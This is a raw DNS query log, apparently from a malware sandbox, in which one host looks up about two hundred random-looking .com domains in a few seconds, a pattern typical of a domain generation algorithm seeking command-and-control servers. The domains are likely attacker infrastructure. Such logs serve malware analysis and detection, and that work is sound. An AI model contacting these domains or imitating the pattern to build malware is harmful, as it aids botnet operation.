Aug 23, 2024 18:48:53.238585949 CEST	192.168.2.4	1.1.1.1	0xfaa6	Standard query (0)	puvywup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.238723993 CEST	192.168.2.4	1.1.1.1	0xc49	Standard query (0)	vojygok.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.239295006 CEST	192.168.2.4	1.1.1.1	0xcc6f	Standard query (0)	lyryxen.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.239316940 CEST	192.168.2.4	1.1.1.1	0xf0a2	Standard query (0)	gahyfow.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.239454031 CEST	192.168.2.4	1.1.1.1	0x3756	Standard query (0)	vocyquc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.239988089 CEST	192.168.2.4	1.1.1.1	0x18a9	Standard query (0)	qegyfil.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.240011930 CEST	192.168.2.4	1.1.1.1	0xfaf8	Standard query (0)	puryxag.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.240286112 CEST	192.168.2.4	1.1.1.1	0x450e	Standard query (0)	gacyqys.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.240838051 CEST	192.168.2.4	1.1.1.1	0xc9f7	Standard query (0)	lygyfir.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.240885973 CEST	192.168.2.4	1.1.1.1	0x9174	Standard query (0)	qexyqyv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.241025925 CEST	192.168.2.4	1.1.1.1	0xfd66	Standard query (0)	vowyzam.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.241771936 CEST	192.168.2.4	1.1.1.1	0x833f	Standard query (0)	pufydul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.242289066 CEST	192.168.2.4	1.1.1.1	0x87cd	Standard query (0)	pujymel.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.242326975 CEST	192.168.2.4	1.1.1.1	0xe920	Standard query (0)	lyxymed.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.242436886 CEST	192.168.2.4	1.1.1.1	0xb42c	Standard query (0)	gaqyzoh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.242614985 CEST	192.168.2.4	1.1.1.1	0x5d	Standard query (0)	vofydut.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.242635965 CEST	192.168.2.4	1.1.1.1	0xd9b9	Standard query (0)	lymylij.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.242846012 CEST	192.168.2.4	1.1.1.1	0xd2c7	Standard query (0)	gadyduz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.242861032 CEST	192.168.2.4	1.1.1.1	0x6894	Standard query (0)	puzymev.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.243053913 CEST	192.168.2.4	1.1.1.1	0x9658	Standard query (0)	qeqyloq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.754823923 CEST	192.168.2.4	1.1.1.1	0xfb51	Standard query (0)	volymaf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.756541967 CEST	192.168.2.4	1.1.1.1	0xf098	Standard query (0)	pumyliq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.756645918 CEST	192.168.2.4	1.1.1.1	0x7483	Standard query (0)	lysysyx.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.757152081 CEST	192.168.2.4	1.1.1.1	0x1976	Standard query (0)	galynab.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.757587910 CEST	192.168.2.4	1.1.1.1	0xb95	Standard query (0)	pupypep.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.757692099 CEST	192.168.2.4	1.1.1.1	0xe243	Standard query (0)	qekynog.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.758198977 CEST	192.168.2.4	1.1.1.1	0xf3f3	Standard query (0)	vonykuk.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.758384943 CEST	192.168.2.4	1.1.1.1	0x858	Standard query (0)	vopypec.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.758476973 CEST	192.168.2.4	1.1.1.1	0xa213	Standard query (0)	ganykuw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.758951902 CEST	192.168.2.4	1.1.1.1	0x60d3	Standard query (0)	lykynon.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.759141922 CEST	192.168.2.4	1.1.1.1	0x838	Standard query (0)	qebykul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.759449005 CEST	192.168.2.4	1.1.1.1	0xb7c5	Standard query (0)	gatypas.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.759738922 CEST	192.168.2.4	1.1.1.1	0xb359	Standard query (0)	lyvyjyr.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.759788036 CEST	192.168.2.4	1.1.1.1	0x893	Standard query (0)	pujybig.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.760514021 CEST	192.168.2.4	1.1.1.1	0x3553	Standard query (0)	qedysyp.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.761104107 CEST	192.168.2.4	1.1.1.1	0xa65a	Standard query (0)	vojybim.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.761614084 CEST	192.168.2.4	1.1.1.1	0x71f8	Standard query (0)	qetytav.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.762268066 CEST	192.168.2.4	1.1.1.1	0x9c79	Standard query (0)	puvyjyl.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.763292074 CEST	192.168.2.4	1.1.1.1	0x6d2a	Standard query (0)	lyrytod.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.763577938 CEST	192.168.2.4	1.1.1.1	0xde0b	Standard query (0)	gahyvuh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.763676882 CEST	192.168.2.4	1.1.1.1	0x9a6a	Standard query (0)	vocyjet.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.764348030 CEST	192.168.2.4	1.1.1.1	0xde9d	Standard query (0)	purytov.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.764434099 CEST	192.168.2.4	1.1.1.1	0x4124	Standard query (0)	qegyvuq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.765321016 CEST	192.168.2.4	1.1.1.1	0x6532	Standard query (0)	gacyhez.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.765388966 CEST	192.168.2.4	1.1.1.1	0xcbec	Standard query (0)	lygyvuj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.765875101 CEST	192.168.2.4	1.1.1.1	0x5807	Standard query (0)	qexyhap.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.765924931 CEST	192.168.2.4	1.1.1.1	0x41e7	Standard query (0)	vowyrif.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.766794920 CEST	192.168.2.4	1.1.1.1	0xd2d8	Standard query (0)	pufycyq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.766910076 CEST	192.168.2.4	1.1.1.1	0x5e5d	Standard query (0)	gaqyrib.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.767693043 CEST	192.168.2.4	1.1.1.1	0xccd8	Standard query (0)	vofycyk.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.768063068 CEST	192.168.2.4	1.1.1.1	0xf3f	Standard query (0)	lyxygax.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.768171072 CEST	192.168.2.4	1.1.1.1	0x2fc3	Standard query (0)	qeqyrug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.768688917 CEST	192.168.2.4	1.1.1.1	0xef3d	Standard query (0)	puzygop.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.769033909 CEST	192.168.2.4	1.1.1.1	0xfea4	Standard query (0)	gadycew.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.769515991 CEST	192.168.2.4	1.1.1.1	0xead4	Standard query (0)	lymywun.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.769900084 CEST	192.168.2.4	1.1.1.1	0x1ef5	Standard query (0)	qedyxel.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.770373106 CEST	192.168.2.4	1.1.1.1	0xd581	Standard query (0)	volygoc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.770626068 CEST	192.168.2.4	1.1.1.1	0x885b	Standard query (0)	pumywug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.770828962 CEST	192.168.2.4	1.1.1.1	0x2cf1	Standard query (0)	galyfis.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.771146059 CEST	192.168.2.4	1.1.1.1	0x815	Standard query (0)	lysyxar.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.771703959 CEST	192.168.2.4	1.1.1.1	0x5c24	Standard query (0)	qekyfiv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.771891117 CEST	192.168.2.4	1.1.1.1	0x4b8c	Standard query (0)	vonyqym.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.772404909 CEST	192.168.2.4	1.1.1.1	0x6419	Standard query (0)	pupyxal.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.772774935 CEST	192.168.2.4	1.1.1.1	0x54f0	Standard query (0)	ganyqyh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.773459911 CEST	192.168.2.4	1.1.1.1	0x5d48	Standard query (0)	lykyfud.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.775729895 CEST	192.168.2.4	1.1.1.1	0xf54f	Standard query (0)	vopyzot.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.782687902 CEST	192.168.2.4	1.1.1.1	0x833c	Standard query (0)	qebyqeq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.783181906 CEST	192.168.2.4	1.1.1.1	0xfa5a	Standard query (0)	pujyduv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.783818960 CEST	192.168.2.4	1.1.1.1	0xfd1	Standard query (0)	gatyzoz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.784385920 CEST	192.168.2.4	1.1.1.1	0xa000	Standard query (0)	lyvymej.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.784846067 CEST	192.168.2.4	1.1.1.1	0xa945	Standard query (0)	vojyduf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.784909964 CEST	192.168.2.4	1.1.1.1	0x218e	Standard query (0)	qetylip.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.785295010 CEST	192.168.2.4	1.1.1.1	0x2321	Standard query (0)	gahydyb.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.785557985 CEST	192.168.2.4	1.1.1.1	0xc74a	Standard query (0)	puvymaq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.785604000 CEST	192.168.2.4	1.1.1.1	0xaf12	Standard query (0)	lyrylix.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.785777092 CEST	192.168.2.4	1.1.1.1	0x785f	Standard query (0)	vocymak.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.786372900 CEST	192.168.2.4	1.1.1.1	0x6a94	Standard query (0)	qegysyg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.786648035 CEST	192.168.2.4	1.1.1.1	0xc586	Standard query (0)	purylup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.786694050 CEST	192.168.2.4	1.1.1.1	0x1012	Standard query (0)	gacynow.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.786844969 CEST	192.168.2.4	1.1.1.1	0x969	Standard query (0)	qexynol.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.786983967 CEST	192.168.2.4	1.1.1.1	0x608d	Standard query (0)	vowykuc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.787111998 CEST	192.168.2.4	1.1.1.1	0xa901	Standard query (0)	lygysen.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.787249088 CEST	192.168.2.4	1.1.1.1	0x59c8	Standard query (0)	gaqykus.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.787384033 CEST	192.168.2.4	1.1.1.1	0xa0e	Standard query (0)	pufypeg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:54.003997087 CEST	192.168.2.4	1.1.1.1	0x31c1	Standard query (0)	lygyvuj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.167090893 CEST	192.168.2.4	1.1.1.1	0x9fb2	Standard query (0)	lyxynir.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.167692900 CEST	192.168.2.4	1.1.1.1	0x121	Standard query (0)	vofypam.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.176821947 CEST	192.168.2.4	1.1.1.1	0x98fd	Standard query (0)	qeqykyv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.177357912 CEST	192.168.2.4	1.1.1.1	0xe7fc	Standard query (0)	puzybil.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.188448906 CEST	192.168.2.4	1.1.1.1	0xbd84	Standard query (0)	gadypah.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.189058065 CEST	192.168.2.4	1.1.1.1	0x8c4d	Standard query (0)	lymyjyd.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.191123962 CEST	192.168.2.4	1.1.1.1	0x5f44	Standard query (0)	volybut.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.192549944 CEST	192.168.2.4	1.1.1.1	0x59d4	Standard query (0)	qedytoq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.193335056 CEST	192.168.2.4	1.1.1.1	0x722a	Standard query (0)	pumyjev.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.193924904 CEST	192.168.2.4	1.1.1.1	0x737a	Standard query (0)	galyvuz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.194302082 CEST	192.168.2.4	1.1.1.1	0xf51f	Standard query (0)	lysytoj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.194832087 CEST	192.168.2.4	1.1.1.1	0xffef	Standard query (0)	qekyvup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.194956064 CEST	192.168.2.4	1.1.1.1	0xd81e	Standard query (0)	vonyjef.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.195776939 CEST	192.168.2.4	1.1.1.1	0x2169	Standard query (0)	pupytiq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.195835114 CEST	192.168.2.4	1.1.1.1	0xbbe	Standard query (0)	ganyhab.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.195985079 CEST	192.168.2.4	1.1.1.1	0x9e42	Standard query (0)	lykyvyx.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.196552038 CEST	192.168.2.4	1.1.1.1	0x1e74	Standard query (0)	vopyrik.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.196640015 CEST	192.168.2.4	1.1.1.1	0x3e3f	Standard query (0)	qebyhag.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.197176933 CEST	192.168.2.4	1.1.1.1	0x6f34	Standard query (0)	gatyruw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.197293997 CEST	192.168.2.4	1.1.1.1	0xb967	Standard query (0)	pujycyp.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.197848082 CEST	192.168.2.4	1.1.1.1	0xdf2b	Standard query (0)	lyvygon.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.197909117 CEST	192.168.2.4	1.1.1.1	0xd26c	Standard query (0)	vojycec.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.198523045 CEST	192.168.2.4	1.1.1.1	0x1fd5	Standard query (0)	qetyrul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.199014902 CEST	192.168.2.4	1.1.1.1	0xb234	Standard query (0)	puvygog.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.203022957 CEST	192.168.2.4	1.1.1.1	0x577e	Standard query (0)	gahyces.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.204050064 CEST	192.168.2.4	1.1.1.1	0xd066	Standard query (0)	lyrywur.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.208858967 CEST	192.168.2.4	1.1.1.1	0x374f	Standard query (0)	vocygim.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.209112883 CEST	192.168.2.4	1.1.1.1	0x1dc5	Standard query (0)	qegyxav.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.209477901 CEST	192.168.2.4	1.1.1.1	0xab05	Standard query (0)	purywyl.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.209649086 CEST	192.168.2.4	1.1.1.1	0x2a4	Standard query (0)	gacyfih.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.210834026 CEST	192.168.2.4	1.1.1.1	0xd63f	Standard query (0)	lygyxad.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.211165905 CEST	192.168.2.4	1.1.1.1	0x4f76	Standard query (0)	vowyqyt.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.211494923 CEST	192.168.2.4	1.1.1.1	0x4f8f	Standard query (0)	qexyfuq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.212141037 CEST	192.168.2.4	1.1.1.1	0x4321	Standard query (0)	pufyxov.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.212472916 CEST	192.168.2.4	1.1.1.1	0x3a0	Standard query (0)	gaqyqez.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.212673903 CEST	192.168.2.4	1.1.1.1	0xd00	Standard query (0)	lyxyfuj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.213300943 CEST	192.168.2.4	1.1.1.1	0x4878	Standard query (0)	vofyzof.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.220673084 CEST	192.168.2.4	1.1.1.1	0x7e91	Standard query (0)	qeqyqep.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.220879078 CEST	192.168.2.4	1.1.1.1	0x283e	Standard query (0)	gadyzib.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.221239090 CEST	192.168.2.4	1.1.1.1	0xaab2	Standard query (0)	puzyduq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.221391916 CEST	192.168.2.4	1.1.1.1	0xc2b0	Standard query (0)	lymymax.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.231272936 CEST	192.168.2.4	1.1.1.1	0xea2d	Standard query (0)	pumymap.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.238279104 CEST	192.168.2.4	1.1.1.1	0xf4a5	Standard query (0)	volydyk.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.238846064 CEST	192.168.2.4	1.1.1.1	0x39a6	Standard query (0)	qedylig.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.239262104 CEST	192.168.2.4	1.1.1.1	0x71aa	Standard query (0)	galydyw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.240865946 CEST	192.168.2.4	1.1.1.1	0xc879	Standard query (0)	vonymoc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.241347075 CEST	192.168.2.4	1.1.1.1	0x51fb	Standard query (0)	lysylun.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.242312908 CEST	192.168.2.4	1.1.1.1	0xc19c	Standard query (0)	qekysel.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.242774963 CEST	192.168.2.4	1.1.1.1	0xeb17	Standard query (0)	pupylug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.246151924 CEST	192.168.2.4	1.1.1.1	0x61d2	Standard query (0)	ganynos.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.247128010 CEST	192.168.2.4	1.1.1.1	0xdcd7	Standard query (0)	lykyser.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.247745991 CEST	192.168.2.4	1.1.1.1	0x7cc4	Standard query (0)	vopykum.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.248130083 CEST	192.168.2.4	1.1.1.1	0x1e02	Standard query (0)	qebyniv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.249432087 CEST	192.168.2.4	1.1.1.1	0xbdd1	Standard query (0)	pujypal.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.250950098 CEST	192.168.2.4	1.1.1.1	0x3816	Standard query (0)	gatykyh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.251462936 CEST	192.168.2.4	1.1.1.1	0x1ece	Standard query (0)	lyvynid.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.253140926 CEST	192.168.2.4	1.1.1.1	0x8145	Standard query (0)	vojypat.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.254193068 CEST	192.168.2.4	1.1.1.1	0x5e1d	Standard query (0)	qetykyq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.254757881 CEST	192.168.2.4	1.1.1.1	0x906c	Standard query (0)	puvybuv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.255146027 CEST	192.168.2.4	1.1.1.1	0xfb7b	Standard query (0)	gahypoz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.255467892 CEST	192.168.2.4	1.1.1.1	0x9be	Standard query (0)	lyryjej.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.256352901 CEST	192.168.2.4	1.1.1.1	0x3b34	Standard query (0)	vocybuf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.256737947 CEST	192.168.2.4	1.1.1.1	0x6f52	Standard query (0)	qegytop.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.257247925 CEST	192.168.2.4	1.1.1.1	0x57b1	Standard query (0)	puryjeq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.741251945 CEST	192.168.2.4	1.1.1.1	0x95a7	Standard query (0)	gacyvub.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.742098093 CEST	192.168.2.4	1.1.1.1	0x6022	Standard query (0)	lygytix.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.743108034 CEST	192.168.2.4	1.1.1.1	0x8857	Standard query (0)	vowyjak.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.743738890 CEST	192.168.2.4	1.1.1.1	0xe58f	Standard query (0)	qexyvyg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.744199991 CEST	192.168.2.4	1.1.1.1	0x20e2	Standard query (0)	pufytip.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.744570017 CEST	192.168.2.4	1.1.1.1	0x2d2c	Standard query (0)	gaqyhaw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.745035887 CEST	192.168.2.4	1.1.1.1	0xf87f	Standard query (0)	lyxyvyn.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.745122910 CEST	192.168.2.4	1.1.1.1	0x4af9	Standard query (0)	vofyruc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.745649099 CEST	192.168.2.4	1.1.1.1	0xd617	Standard query (0)	qeqyhol.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.746109009 CEST	192.168.2.4	1.1.1.1	0x8a5	Standard query (0)	gadyrus.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.746295929 CEST	192.168.2.4	1.1.1.1	0xa209	Standard query (0)	puzyceg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.746746063 CEST	192.168.2.4	1.1.1.1	0xdccf	Standard query (0)	qedyruv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.746923923 CEST	192.168.2.4	1.1.1.1	0xf834	Standard query (0)	volycem.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.747284889 CEST	192.168.2.4	1.1.1.1	0xe230	Standard query (0)	pumygil.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.747801065 CEST	192.168.2.4	1.1.1.1	0x9a8a	Standard query (0)	galycah.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.747968912 CEST	192.168.2.4	1.1.1.1	0xf87b	Standard query (0)	lysywyd.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.748317003 CEST	192.168.2.4	1.1.1.1	0xcf36	Standard query (0)	vonygit.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.748897076 CEST	192.168.2.4	1.1.1.1	0xd34c	Standard query (0)	qekyxaq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.748970032 CEST	192.168.2.4	1.1.1.1	0x6d27	Standard query (0)	pupywyv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.749465942 CEST	192.168.2.4	1.1.1.1	0x6392	Standard query (0)	lykyxoj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.749582052 CEST	192.168.2.4	1.1.1.1	0xa5e8	Standard query (0)	ganyfuz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.750097036 CEST	192.168.2.4	1.1.1.1	0x780	Standard query (0)	vopyqef.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.750538111 CEST	192.168.2.4	1.1.1.1	0xd951	Standard query (0)	qebyfup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.750761032 CEST	192.168.2.4	1.1.1.1	0xb811	Standard query (0)	pujyxoq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.751210928 CEST	192.168.2.4	1.1.1.1	0xb32a	Standard query (0)	gatyqeb.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.751666069 CEST	192.168.2.4	1.1.1.1	0x389e	Standard query (0)	lyvyfux.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.752047062 CEST	192.168.2.4	1.1.1.1	0x8b3a	Standard query (0)	vojyzik.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.752597094 CEST	192.168.2.4	1.1.1.1	0x9584	Standard query (0)	qetyqag.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.752736092 CEST	192.168.2.4	1.1.1.1	0xc073	Standard query (0)	puvydyp.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.753266096 CEST	192.168.2.4	1.1.1.1	0xa505	Standard query (0)	gahyziw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.753266096 CEST	192.168.2.4	1.1.1.1	0x8fd	Standard query (0)	lyryman.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.753997087 CEST	192.168.2.4	1.1.1.1	0x870d	Standard query (0)	qegylul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.754148006 CEST	192.168.2.4	1.1.1.1	0x3cad	Standard query (0)	purymog.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.754668951 CEST	192.168.2.4	1.1.1.1	0x2c4d	Standard query (0)	vocydyc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.754940987 CEST	192.168.2.4	1.1.1.1	0x5ef	Standard query (0)	gacydes.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.755642891 CEST	192.168.2.4	1.1.1.1	0x2514	Standard query (0)	lygylur.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.755712986 CEST	192.168.2.4	1.1.1.1	0x8a86	Standard query (0)	vowymom.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.756203890 CEST	192.168.2.4	1.1.1.1	0x8f24	Standard query (0)	qexysev.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.756644011 CEST	192.168.2.4	1.1.1.1	0x933	Standard query (0)	pufylul.com	A (IP address)	IN (0x0001)	false
